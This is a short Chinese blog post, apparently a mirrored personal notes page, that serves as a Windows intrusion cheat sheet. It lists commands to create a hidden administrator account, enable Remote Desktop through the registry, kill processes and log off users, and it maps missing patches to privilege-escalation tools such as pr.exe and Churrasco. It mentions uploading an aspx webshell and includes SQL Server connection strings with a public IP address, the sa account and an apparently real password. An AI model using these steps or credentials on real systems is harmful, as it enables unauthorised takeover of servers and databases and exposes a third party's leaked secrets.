zoukankan      html  css  js  c++  java
  • 日月神教

    systeminfo

    net user name pass /add

    net localgroup administrators name /add

    shutdown -r -f -t 1

    tasklist /svc

    taskkill /im 进程名 /f

    logoff 用户ID             ---------------"net user"查看后  去别人登录pr.exe "logoff 0"

    ver

    set

    whoami

    net stop/start XX服务

    /c net localgroup administrators(user)

    reg add hklmsystemcurrentcontrolset erminal" "server /v fDenyTSConnection /t REG_DWORD /d 0 /f

    提权工具与布丁对比-VER007

    补丁号:
    KB952004 MS09-012 pr.exe
    KB956572 MS09-012 巴西烤肉
    KB2393802 ms11011
    KB2503665 ms11046
    KB2592799 ms11080

    MySQL 3306 数据库 root
    mssql 1433 数据库 sa

    <add name="association" connectionString="server=.;uid=sa;pwd=password;database=wwbz" providerName="System.Data.Sqlclient"/>

    <add name="CJQConnectionString" connectionString="Data Source=61.237.237.218;Initial Catalog=Commerce;Persist Security Info=True;User ID=sa;Password=gold20081208spider68417827yq" providerName="System.Data.SqlClient"/>
    <!--<add name="CJQConnectionString" connectionString="Data Source=.;Initial Catalog=Commerce;Persist Security Info=True;User ID=sa;Password=password " providerName="System.Data.SqlClient"/>-->

    上传apsx马  asp=php<aspx<jsp

    使用方法:

    pr.exe “ 命令 ”  cmd DOS命令  “” " "

  • 相关阅读:
    考试心得 模拟18
    模拟17 题解
    模拟16 题解
    考试心得 模拟17
    模拟15 题解(waiting)
    BZOJ2653 middle 【主席树】【二分】*
    BZOJ3932 CQOI2015 任务查询系统 【主席树】
    与或 【线段树】 *
    BZOJ1014 JSOI2008 火星人prefix 【非旋转Treap】*
    网络流--最大权闭合子图 *
  • 原文地址:https://www.cnblogs.com/alex-13/p/3728628.html
Copyright © 2011-2022 走看看